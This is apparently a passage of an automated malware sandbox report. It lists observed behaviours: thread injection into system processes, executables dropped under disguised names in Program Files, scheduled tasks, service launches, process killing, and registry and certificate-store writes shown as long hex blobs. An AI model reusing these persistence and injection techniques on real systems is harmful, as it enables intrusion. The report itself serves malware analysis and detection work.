| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4516 set thread context of 1640 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
| PID 4616 set thread context of 6044 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 4616 set thread context of 6080 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
| File opened for modification | C:\Program Files (x86)\LightCleaner\VTRegScan.dll | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\LightCleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-K12OK.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LightCleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\Mozilla Maintenance Service\Civutisudi.exe | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
| File opened for modification | C:\Program Files (x86)\LightCleaner\LightCleaner.exe | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-GAF4Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe | N/A |
| File created | C:\Program Files (x86)\Mozilla Maintenance Service\Civutisudi.exe.config | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-QQE4Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-AGPK8.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
| File created | C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe.config | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
| File created | C:\Program Files (x86)\LightCleaner\is-DRIA0.tmp | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864